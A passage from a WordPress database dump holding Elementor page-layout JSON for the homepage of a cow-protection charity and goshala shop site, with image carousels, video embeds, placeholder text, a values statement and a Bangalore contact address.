here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9449,1608,'_elementor_page_assets','a:0:{}'),(9450,1609,'_elementor_edit_mode','builder'),(9451,1609,'_elementor_template_type','wp-page'),(9452,1609,'_elementor_version','3.7.8'),(9453,1609,'_wp_page_template','elementor_canvas'),(9454,1609,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\"